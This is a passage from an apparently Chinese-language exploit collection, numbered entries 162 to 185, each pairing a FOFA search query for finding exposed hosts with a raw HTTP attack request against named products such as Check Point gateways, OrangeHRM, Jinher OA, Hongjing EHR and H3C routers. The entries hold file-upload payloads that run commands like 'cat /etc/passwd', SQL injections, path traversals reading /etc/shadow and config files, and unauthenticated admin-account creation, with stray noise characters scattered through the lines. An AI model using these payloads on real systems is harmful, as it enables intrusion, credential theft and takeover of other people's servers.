( @ _( \0 Q: |# m1 H3 |) k<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>' ~0 B- S+ R0 G) l5 R4 {% e
<tag>3</tag>' I3 Q3 \) b$ |: J; v( K8 p
</UploadResume>
' b# t8 s- @- a+ \6 O</soap:Body>! C$ m9 ~0 L7 j# r
</soap:Envelope>3 g9 a, T3 r2 Q3 B! Q; p! W9 V" i
* H. A* |0 E7 r( x& r# A1 n5 T* s! e; U( X- X% |* `
http://x.x.x.x/dizxdell.aspx
9 Y# O' B, r M1 z" E" b+ _2 _4 g) F! k- ^4 r- C% O, h8 |3 X; B
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
8 Y o/ Y& s: }5 ] }( C5 z f1 yFOFA: app="和丰山海-数字标牌"
- W* w& t# k* tPOST /QH.aspx HTTP/1.1
1 N( i/ O5 e' H+ OHost: x.x.x.x
& C2 X M* X" {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0( `. J$ U N; u" F; L+ V- Q+ Q% w
Connection: close
+ S! M8 p3 l! T) a4 A5 ?4 _ zContent-Length: 583
% g* X% n6 ^. Q! Y/ o# LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
] o( c% i% D# ^% [Accept-Encoding: gzip4 k- r7 M2 C. P" _3 F7 \
5 g8 ]( a" T. o+ L
------WebKitFormBoundaryeegvclmyurlotuey
) `) Z. x! `: g3 h) DContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
! t2 b! F M. b& J% p1 l/ j* xContent-Type: application/octet-stream
. c" L* {9 B0 ?2 _/ T h! ?" k4 ~4 g1 e) c, u% K5 I7 T7 e# W# G$ \6 _+ q
<% response.write("ujidwqfuuqjalgkvrpqy") %>) B8 M6 a( J H( f4 I8 J
------WebKitFormBoundaryeegvclmyurlotuey$ {" k5 v1 ]& t& Z# E
Content-Disposition: form-data; name="action"
( o* g0 G6 V3 i
& m7 W7 d( W5 M$ N7 T7 L, y7 h1 wupload
; D& h' n& E. {' H------WebKitFormBoundaryeegvclmyurlotuey
. \% u/ b$ A$ a, UContent-Disposition: form-data; name="responderId"
+ [ Y5 q8 _& a1 O& U, [3 a
4 b0 D2 ^) e: d3 IResourceNewResponder
- ~ k& [. g" J, Y------WebKitFormBoundaryeegvclmyurlotuey
5 M: A( q' s$ k3 Y8 ?1 ?# H& x LContent-Disposition: form-data; name="remotePath"
) {2 l6 L1 B9 k+ X
( C! `- m, ]1 t: I/opt/resources
# d" }& a4 {* D0 ~: O. \------WebKitFormBoundaryeegvclmyurlotuey--
0 E: e1 R' Q8 o( h" k, S5 h o- H/ }, j- I6 T0 [
( i+ Y V1 l% H, W" e$ b
http://x.x.x.x/opt/resources/kjuhitjgk.aspx$ L# z! A' z; I0 P( u2 q
1 p9 M9 M6 E8 t# j
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; v2 n2 @2 _+ [4 E" `- i" fFOFA: icon_hash="-795291075"
$ @) U. P3 A( j. @POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
% \# r \# Z2 j- e" a- U( cHost: x.x.x.x
* G8 u" ?0 m4 `7 P9 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36% v: f0 U7 G) A/ J% Y K/ _. X% }
Connection: close
+ T( U* t+ a; D0 P3 cContent-Length: 293
$ u3 a0 e2 _4 o3 }Accept: */*, T6 o! `2 o0 u: o) m; h6 r4 @+ i
Accept-Encoding: gzip, deflate
% R) o1 C. S% Z' x! p% oAccept-Language: zh-CN,zh;q=0.9
[( x" x: m; T" c. D, Z( o$ DContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod- q* j2 @% h! c* m
9 C# S2 L9 K5 f------iiqvnofupvhdyrcoqyuujyetjvqgocod O/ B8 I) ]) x" [1 b1 ?6 h
Content-Disposition: form-data; name="name". A/ }/ H8 U2 R% Z$ g* ]! C
: ]1 @+ p, g: L
1.php, |- c, n7 a5 P% a' F3 D, ]( ]9 ]
------iiqvnofupvhdyrcoqyuujyetjvqgocod- l: e" F5 t1 p! O& h/ F9 x' b
Content-Disposition: form-data; name="upfile"; filename="1.php"& H, ~! M; K" r/ ]" U$ m$ o
Content-Type: image/jpeg' k( b& v8 o* |
# a: i# v0 {, E
rvjhvbhwwuooyiioxega
# z+ V8 i; `0 z' b% `) _- p# P7 f------iiqvnofupvhdyrcoqyuujyetjvqgocod--# ~+ |# L/ O1 D" _
& ]- B+ b" ^2 I: s5 r
, l: w7 O! ~0 @5 Y$ A$ M0 Z0 t164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传1 ]9 {& ]/ X' N$ m' ~3 ^% ~
FOFA: title="智慧综合管理平台登入"
; \; s) j- \9 O! WPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
- [5 v7 O( u" U( F% `3 a: vHost: x.x.x.x/ T9 R; g, V$ T( G1 n# n8 n) c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
. V9 [9 A4 z3 mContent-Length: 2881 K$ h/ q$ e& r5 P$ [( \5 }
Accept: application/json, text/javascript, */*; q=0.01
4 _9 X8 ~3 x4 ~, ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
: Z2 W) a8 y* X" t% W/ b+ X; _Connection: close' w' @2 A* k7 e3 H. O E
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl( |; Y+ x$ L; P# ]$ d
X-Requested-With: XMLHttpRequest- ? g8 J; V5 {' ~, S
Accept-Encoding: gzip, ], E% I" x o6 J4 H7 R( n( R0 m& q. ]
8 s6 c% n9 {1 y. X# u
------dqdaieopnozbkapjacdbdthlvtlyl0 Y* A# L; ? }* j; d
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"1 m, W1 K: Y2 C7 C5 ]
Content-Type: image/jpeg
6 i* g! @% Q. ?# ]) H6 S. b) R; @( G, U4 B' K; C
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>; Y' k, I% Y! n
------dqdaieopnozbkapjacdbdthlvtlyl--8 L! i+ K* \5 L' j3 i2 o# O9 M
: [% \+ @$ a# ?) G- u) R
3 P& o. B+ w* B& nhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
; B% ^0 k5 N% I* x& S0 n& d: K0 u1 ^: u8 D( b
165. OrangeHRM 3.3.3 SQL 注入
7 B7 Y% W' O8 o/ n& `* B8 U/ OCVE-2024-364282 x7 h0 S8 n4 S" H! u) Y: E# i
FOFA: app="OrangeHRM-产品"7 @) Z; ]$ A+ j5 I, H
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
# c' M. I$ t; s1 W2 T5 x
$ o& B/ P3 F; I) [
) M& V: u& {: t166. 中成科信票务管理平台SeatMapHandler SQL注入$ s2 z# `' y' O( W; i
FOFA:body="技术支持:北京中成科信科技发展有限公司"
, ~! W+ H" X5 ^2 ~3 h' E) [9 tPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
6 l9 q) r7 |5 p. _Host:
. W, u; Y/ K& q! IPragma: no-cache
$ j/ `4 }; _* n. M( [5 a: e1 F3 HCache-Control: no-cache
" _* ?& Y( v6 m' {6 c) eUpgrade-Insecure-Requests: 1 `! k T; \* R5 ~' Z/ O; a' {* V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
4 W2 j* C4 @/ M4 N$ K0 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 |7 R# ?/ M& o7 `0 X8 }5 w
Accept-Encoding: gzip, deflate2 V/ c* ~" h6 O4 \
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ z8 z' f7 H+ |# d* ~
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE5 h" P7 }; C2 T# w
Connection: close3 x- F8 f# K: u) a! s
Content-Type: application/x-www-form-urlencoded( {7 r3 }) w9 B! _
Content-Length: 89
( F& j/ B2 x7 E) t
* K* {+ t1 G9 XMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
! ^1 N* J4 |' I+ h1 D, N
/ Y* [! w% t; }8 s) D/ B1 a
7 Z r8 [9 ~( C167. 精益价值管理系统 DownLoad.aspx任意文件读取
% U4 t6 ^1 f& O8 w+ E9 `FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"3 _% g% g4 z8 G8 L
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- O# ?- R& y+ \ U" G# T
Host:
; ]: j3 a' E& o" D# ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% `* g4 o" V* N3 h# M
Content-Type: application/x-www-form-urlencoded1 j4 {" b1 R) V3 E/ D
Accept-Encoding: gzip, deflate
4 `' ]* W; t1 X" V* |Accept: */*% A+ K3 L4 B) x1 j% J7 u2 Y
Connection: keep-alive+ s8 R8 T7 m* `
/ Z$ I5 }% |$ W
/ \. |4 Q- [6 d) j& Y& ~ r168. 宏景EHR OutputCode 任意文件读取
* J' ]7 {/ N; h mFOFA:app="HJSOFT-HCM"+ T% H3 s% n/ ]3 P- V# {& z
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.17 H7 a7 @# U) _' t0 n
Host: your-ip
0 H% }7 D. p0 p$ T3 y/ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
/ f) w& R( B% [Content-Type: application/x-www-form-urlencoded2 b1 I8 l3 p& W5 _! b$ j
Connection: close
- U+ m7 ? y0 L6 U9 {- B# f# L$ T+ z" B4 G
+ W' f2 B: V" Y2 o/ q
, v% f2 @) a& h2 @169. 宏景EHR downlawbase SQL注入
' S2 e, s2 `* bFOFA:app="HJSOFT-HCM"
9 M! j: u W( m- oGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
g7 V0 X* ~5 r( KHost: your-ip1 O4 O# z5 v0 h |% Z1 _( w& S3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 ^, V' X( l: @) W/ ?: _# dAccept: */*
' o6 F V3 [1 N0 q$ m0 h4 GAccept-Encoding: gzip, deflate8 i& \. s# P1 Q0 Y
Connection: close
2 s5 H V6 s7 |7 m* |9 H2 T) d- m! o3 D) b- e1 V
1 i3 W$ O5 V) G; @( R
5 M( u1 r# D: X- D) e. Z) N170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 H+ [* ?5 E. M% n& c
FOFA:body="/general/sys/hjaxmanage.js"
% `0 B) g4 `) X5 g+ J+ B0 vPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1( p/ G/ L/ `' f( G, F
Host: balalanengliang( f9 Z+ w7 D' s2 ?' j
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. y+ o3 K, I4 y1 BContent-Type: application/x-www-form-urlencoded. x" n+ @: I w2 I) Y. L) g
* U; V5 P. L$ v0 _filename=../webapps/ROOT/WEB-INF/web.xml
% O8 C1 M! g( n4 W- L' h+ ~
- H/ k4 |( V# Y7 w' D! s: P6 Z% c- ~4 H" a9 ~- ~; i t3 ^
171. 通天星CMSV6车载定位监控平台 SQL注入
8 T4 ], f7 H# l* t; @; z* y, i. a5 d# L. hFOFA:body="/808gps/"
5 ^5 _! H$ S' K) e. M( u1 ^& qGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
; _" Q$ N! g7 N4 X+ O z8 |4 g" mHost: your-ip) ` M G7 p5 ~* F) S! L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
2 b8 R( y" m! |- h( IAccept: */*2 I. Z) L& m/ l/ {7 H1 w# g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Q6 ?& D2 j3 R3 cAccept-Encoding: gzip, deflate: Q2 Z7 A# }8 R1 A4 A6 {" D8 C
Connection: close5 m% w0 F" F# n" T3 g+ Y$ s, k8 {2 K3 W6 G
7 y& D8 H) r$ b w1 K% F
1 z$ O4 }5 V, N' j# x3 p4 x2 V& f
172. DT-高清车牌识别摄像机任意文件读取! U/ ?" U$ u5 r% y# ]
FOFA:app="DT-高清车牌识别摄像机"
( L) W. J6 I g3 @4 w9 o: Z: j% bGET /../../../../etc/passwd HTTP/1.1 O" K; m0 r8 g$ \5 I3 d6 e
Host: your-ip
8 D) J' b- p9 N/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, U( D: Z& n. U0 ?Accept-Encoding: gzip, deflate
! n& I5 U8 G6 ~0 E3 ~Accept: */*
: J+ m5 }% F# vConnection: keep-alive
- \' u! y: k) [0 k2 A2 A! r. o6 x! p/ e
) f) a) B0 M v* }- Q- w% {" w
4 ]. K: f! m0 T) p* y2 v5 k1 x173. Check Point 安全网关任意文件读取" k- }- x, _$ f: J9 o" U2 m5 Q
CVE-2024-24919
8 A3 g5 g6 k* N2 a$ {- l( BFOFA:app="Check_Point-SSL-Network-Extender"
( y) ^% \( C: j* a% c* V/ D. h! zPOST /clients/MyCRL HTTP/1.10 d3 ?9 g0 ~( I0 ^9 K# P) D+ ?
Host: your-ip
$ [" K; `* V; PContent-Type: application/x-www-form-urlencoded3 C9 c% a$ u- @ p) p
$ @: Q j& R& T( M- maCSHELL/../../../../../../../etc/shadow* M7 b1 O) ]9 V& v& y
8 r2 J/ M p; b
$ O4 S* j2 ]: F5 U. D- G. C6 R9 y: u
; G6 }, I4 c* G7 o( u174. 金和OA C6 FileDownLoad.aspx 任意文件读取: R% S X* ~4 n/ n |0 D
FOFA:app="金和网络-金和OA"- R, T( M( {7 Q5 Q
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
. g, E0 L2 _ q+ y3 oHost: your-ip6 V8 s7 u1 O4 w# m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" c/ [8 K) M8 [5 m y: ?1 w! ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 _% g4 L" D# w
Accept-Encoding: gzip, deflate, br/ ~+ k' a, X1 k( I! W2 R: Q3 p
Accept-Language: zh-CN,zh;q=0.95 c: x( c; F8 ~/ C6 X4 j
Connection: close% Y0 ?0 D( R5 r' l8 o, f3 Q7 E
4 ^: k/ P" n: U& A3 }+ B
, C- A/ O+ C' g( u4 E1 _9 `: T* a; D' x
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- B( s) u- G# O7 V
FOFA:app="金和网络-金和OA"
( l4 ~7 l7 j8 a/ r; xGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1: |3 K. R5 D8 \$ K6 A$ L3 t: S5 `4 l1 z
Host:
4 Y9 N3 s4 }3 ]& ^: B7 G( V0 YUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" S$ T' p2 w5 G( d2 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 o. j L/ k5 o! }4 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: Z5 u% H" f& {
Accept-Encoding: gzip, deflate& i! h9 b' S2 v! n! z f. X
Connection: close$ h( @' v$ s4 a; h9 H8 G) D" e
Upgrade-Insecure-Requests: 1
5 l; @5 G& Q7 X& {* E1 D0 O% g4 Y
4 g9 D+ r# K0 v( F& O: y9 G
+ O& J9 {' L( F( m) Y176. 电信网关配置管理系统 rewrite.php 文件上传" c( B: ~0 \" I; y7 n
FOFA:body="img/login_bg3.png" && body="系统登录"
6 t# M0 q4 m3 R$ t+ vPOST /manager/teletext/material/rewrite.php HTTP/1.1
. r# X- m+ [$ W- s4 h" wHost: your-ip
" Y' t; I! P: ?1 e9 W U# z+ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 }+ ?# a* ^" D! O' \% M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT* e/ ^% b, g. l/ E
Connection: close0 C) g2 S- l# L4 V
1 j( E+ A& B( ]1 i7 k1 C4 U
------WebKitFormBoundaryOKldnDPT2 L. d6 X/ Q$ \# q; }* b( g) Q5 @2 j
Content-Disposition: form-data; name="tmp_name"; filename="test.php"2 V7 X: E+ W& M: V% S$ h1 t3 ?% y
Content-Type: image/png8 S+ p+ j. H6 V6 T3 D' \% w
, g- S4 z- U$ w" z, l4 B8 G* g- t
<?php system("cat /etc/passwd");unlink(__FILE__);?>( H4 J5 x: b1 ^4 ^1 g
------WebKitFormBoundaryOKldnDPT$ w5 f9 \1 j" w) C
Content-Disposition: form-data; name="uploadtime"
9 D k% S) H) G9 _) Q/ U6 R6 |
5 F! V( Y/ ^- g, u3 b
, `; x) [1 w' ], n! a, B------WebKitFormBoundaryOKldnDPT--
& E4 T. u+ g$ K0 e3 s1 x6 `4 ~9 ?5 \" G/ G7 ]4 h( W! S
! M8 P/ B M6 [
; F8 M, O$ @; h" U
177. H3C路由器敏感信息泄露
$ D+ L7 q+ Q. I+ ~! }; U" ]/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg y& o# [; C) j& d/ T3 e9 @0 t
/userLogin.asp/../actionpolicy_status/../M60.cfg
$ A) Y( Z( A* l' q7 e/userLogin.asp/../actionpolicy_status/../GR8300.cfg& d7 _. {0 n# O6 A b
/userLogin.asp/../actionpolicy_status/../GR5200.cfg& T6 r& R! n" y7 l! S+ g% u
/userLogin.asp/../actionpolicy_status/../GR3200.cfg" e8 n" d4 b; ~# r1 Z/ u& E$ B7 K/ o
/userLogin.asp/../actionpolicy_status/../GR2200.cfg" g7 G8 M5 x" w2 h3 z8 C
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg5 A" d' F0 ~2 ?" n1 ^1 x% H/ g6 d
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg. b* W$ D# D+ X2 ?1 x
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
$ Q: `. x* w T4 i3 F/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
) B& v) o. F' T& {8 w2 n/userLogin.asp/../actionpolicy_status/../ER5200.cfg
# V* C& e6 o6 ?9 Z+ q' O b+ s2 A/userLogin.asp/../actionpolicy_status/../ER5100.cfg; h8 _; d) M: g9 I/ x
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg+ G2 j6 S" n0 m/ F
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
q: p" e* m2 P2 Z) g/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
4 L. K/ ?. F9 u1 }; c O/userLogin.asp/../actionpolicy_status/../ER3200.cfg
' \4 }# u: O# o/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg# ?- F' T) Y% J( R- y5 e
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- v2 r6 K' i) _# _/ n/ Z/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg3 ?; x/ k1 G0 X1 s1 W& W0 N
/userLogin.asp/../actionpolicy_status/../ER3100.cfg2 E1 s/ K4 }0 {7 E+ H9 g
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
& x5 v6 t) V8 `; {& j! {4 d/ n1 G, b: u7 n3 N2 v5 l/ h
/ B; [1 u' p- e7 M4 `8 v178. H3C校园网自助服务系统-flexfileupload-任意文件上传7 J* Y0 ?6 {0 m5 P; J( k
FOFA:header="/selfservice"& M) X3 l6 L% l: t! Z9 S0 N* t
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
) p n. g1 c, O8 _; a1 f0 oHost:
6 h& [/ v# Y5 q. L4 h9 P( D3 e) C- CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ t' N7 d" b% Z2 s7 r' F2 cContent-Length: 252# e5 o: b2 H& ~/ s
Accept-Encoding: gzip, deflate
/ R+ |/ Y0 v4 g8 v8 Z( A; K/ DConnection: close/ \- ^. n, W4 ^$ Q* s
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l' t7 V0 z N, w3 N
-----------------aqutkea7vvanpqy3rh2l6 ?# }! }% z5 g+ J1 G
Content-Disposition: form-data; name="12234.txt"; filename="12234"
2 k4 `' S! C( KContent-Type: application/octet-stream
: @+ C. ^% ~+ I. E% lContent-Length: 255
$ U9 q$ O" _7 g/ e; X+ {1 D7 k4 v' l6 E/ ^ _9 a
12234
; y( ~9 n8 U( E-----------------aqutkea7vvanpqy3rh2l--/ x- u6 ^7 C( k- k5 s' b2 ?# q
6 o4 c" z9 U* v" w
9 q# |* \9 E5 z- X0 s: x7 f/ I* ?GET /imc/primepush/%2e%2e/flex/12234.txt7 `2 E& F/ E S2 y) d3 Y
+ S% C3 Q }: S4 Z' p$ n- l, [
5 |6 `' `7 d8 N' ~' I/ r
179. 建文工程管理系统存在任意文件读取
# d, v+ L& ~- t. cPOST /Common/DownLoad2.aspx HTTP/1.15 `* s) o' |! z# p1 m
Host: {{Hostname}}
' D6 ?) W' A4 s g4 _Content-Type: application/x-www-form-urlencoded
8 a Z8 R1 j6 _! KUser-Agent: Mozilla/5.0% x/ {( o4 D% F- M
6 J3 {) q1 t1 O8 l) {" npath=../log4net.config&Name=6 ~: r6 Y9 j' T, v
S8 _+ m" Y F3 \. C) m
# t0 v P) J U3 [8 {180. 帮管客 CRM jiliyu SQL注入7 u [2 J* r" C# R
FOFA:app="帮管客-CRM"
# f& l; @1 @. e0 j' s& e3 OGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
) H- ~( _6 e/ |5 @Host: your-ip
1 c4 P9 w$ Z( }* ~, M* |) EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 D6 t( p9 o/ N* @/ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ d2 O7 Z N5 a7 MAccept-Encoding: gzip, deflate) d* U( g! e: P; k0 [9 b
Accept-Language: zh-CN,zh;q=0.93 @' q& @+ f9 B( A
Connection: close
$ k/ F; ~" H" [2 T% P5 m
' q/ ~" |, C- {, z. k& \: G$ \4 Q; k$ `$ g/ s! k
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入" v% g4 r- \* X$ _6 y
FOFA:"PDCA/js/_publicCom.js"
; W' M) Z9 C) W+ J) \- gPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
2 |4 g( n/ f% N a! GHost: your-ip
+ t0 d u" `. O) h! N1 E$ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
5 M" N+ v) T7 |8 v% I6 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: R/ D, {9 Z5 f: Q
Accept-Encoding: gzip, deflate, br
2 ?' O6 z j( x" i) hAccept-Language: zh-CN,zh;q=0.9
4 ]3 w6 D. ], o) d+ D# a1 J3 lConnection: close
9 @3 ~( W3 l% _Content-Type: application/x-www-form-urlencoded
$ f! z `4 O; I! @, A M: ]
0 x$ Z6 w4 @- k) p
% v5 W) g* a9 [action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=209 V1 B. u; v( v) G& K2 C: Q" E
; A4 o1 [9 z# @
7 V) C1 `; g. J182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 j1 w$ }; ~$ W9 h& hFOFA:"PDCA/js/_publicCom.js"
$ }3 ^" X0 L |1 @$ L! ?POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.13 `5 k$ f/ h0 x% N9 X! P
Host: your-ip+ e5 D8 j: {" k+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' q5 `$ g' \8 k4 K6 e8 D) @' U DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! o# w: [1 _/ _2 |5 a
Accept-Encoding: gzip, deflate, br
3 A* {7 r8 e+ rAccept-Language: zh-CN,zh;q=0.9
1 \* m$ N8 s7 X! s8 l4 bConnection: close. M5 @" F# G% U
Content-Type: application/x-www-form-urlencoded& Q, U" R/ N4 ^+ ~
0 j! J% s; I* o/ K0 Y1 z* x$ a) R' o6 r/ K) k
username=test1234&pwd=test1234&savedays=14 b2 z4 S( _! y9 z# n
/ e2 [7 G; a& |) z$ c2 K
3 F* _9 L5 Y( [6 k0 s: t183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入' O" B; k, w a8 f6 ]/ ?3 ^% p7 O- X
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
0 o5 D6 V, L9 r6 ~( FGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.11 d. c* S7 z* M& Q1 ]) w1 A( z+ t
Host: your-ip$ r9 D* u, ^" S5 K- D+ K5 a$ U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
, S; o; [8 f9 e9 U! a! m3 i& `Accept-Charset: utf-8( c [$ s4 W7 u" T
Accept-Encoding: gzip, deflate
; w2 P) H- }, [( aConnection: close( G& i e; W" w! @; p
# W5 Z6 m& H6 E V4 ^+ k$ ] {
8 S, d ]) Z3 z$ c& }, \+ F3 u% @
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' r/ c, U9 X" `1 z4 g$ {FOFA:server="SunFull-Webs"
' y2 l2 | A1 z( U0 O. \POST /soap/AddUser HTTP/1.17 I8 A8 y7 S: R6 r( U
Host: your-ip
" @8 l: k7 I9 H& xAccept-Encoding: gzip, deflate* O' B1 K+ |) @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) g5 ^5 T2 A. w4 G" U
Accept: application/xml, text/xml, */*; q=0.01( |+ m, [: f# b: C: I3 E9 q5 s
Content-Type: text/xml; charset=utf-8* o* z" f6 P0 W: x4 h( m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; {/ {3 f1 X" B* J5 XX-Requested-With: XMLHttpRequest! s* i8 k6 d, c5 D$ t7 Y
2 q' W6 F( E! U
# n/ i+ v% D' C) n. @ kinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
" G0 f3 @- m7 S' r M3 f0 v# k
' |4 w) D" R( X h% U6 z8 N3 b2 w$ p! A' J2 Y
185. 瑞友天翼应用虚拟化系统SQL注入
" R9 d: o& ^! Jversion < 7.0.5.1
- @) c* i- u. n2 WFOFA:app="REALOR-天翼应用虚拟化系统"" ]1 h) I+ v8 o5 w0 C3 C, p& f- j
